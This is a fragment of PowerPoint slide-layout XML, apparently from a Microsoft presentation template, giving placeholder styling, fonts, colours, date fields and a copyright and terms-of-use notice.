                  <a:srgbClr val="3F3F3F"/>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fld id="{74A398B2-5A34-1A4A-811E-F4027282568C}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>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1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>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900">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="3F3F3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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1143000"/>
            <a:ext cx="3048000" cy="2286000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="0A5BBA"/>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4134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22529"/>
            <a:ext cx="11684000" cy="2109443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="243829" tIns="182870" rIns="121914" bIns="60957" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="609555" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="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marL="0" marR="0" lvl="0" indent="0" defTabSz="609555" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="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marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="609555" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="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rPr>
              <a:t>For more information, see Use of Microsoft Copyrighted Content at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="609555" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="87000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/en-us/legal/intellectualproperty/permissions/default.aspx</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310777" y="103985"/>
            <a:ext cx="3149600" cy="406400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="243829" tIns="182870" rIns="121914" bIns="60957" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="609555"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rPr>
              <a:t>Conditions and Terms of Use</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307789" y="2868966"/>
            <a:ext cx="3149600" cy="370545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="243829" tIns="182870" rIns="121914" bIns="60957" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="609555"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29" tIns="182870" rIns="121914" bIns="60957" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="609555"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277EB5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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29" tIns="182870" rIns="121914" bIns="60957" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="609555"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277EB5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© 2016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29" tIns="182870" rIns="121914" bIns="60957" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="609555" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="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marL="0" marR="0" lvl="0" indent="0" defTabSz="609555" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="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marL="0" marR="0" lvl="0" indent="0" defTabSz="609555" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39897404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fld id="{6E2906D3-A5C3-4D32-8A69-CC2FA2100389}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>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5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>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fld id="{74A398B2-5A34-1A4A-811E-F4027282568C}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>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1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>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Picture Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="1143000"/>
            <a:ext cx="3048000" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>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dirty="0"/>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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20969326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a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6492880"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4E37D975-1845-4A65-97E6-A80E52531A9A}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4673600" y="6354000"/>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11" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA8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0255771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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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70" tIns="137154">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="32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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32001018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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1143000"/>
            <a:ext cx="6096000" cy="2286000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="0A5BBA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182870" tIns="137154">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="32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dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11516701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36" tIns="45718">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630207" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="31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7"/>
            <a:ext cx="3048000" cy="4237039"/>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4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6356355"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="182870" tIns="45718" rIns="182870" bIns="45718" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{85D75B13-7E80-42FD-9382-5489AD605469}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/1/2020</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Segoe Pro Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8850629" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>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FFF257A-30C5-4AFB-911B-BE4CEEA1EA8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3043518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dirty="0"/>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36" tIns="45718">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="630207" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3100">
                <a:latin typeface="Segoe Pro Light"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="31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7"/>
            <a:ext cx="3048000" cy="4237039"/>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5" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6356355"/>
            <a:ext cx="2844800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="182870" tIns="45718" rIns="182870" bIns="45718" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BF96B9E8-AEF0-4371-A5F1-945648794BFB}" type="datetime1">
              <a:rPr kumimoji="0" lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
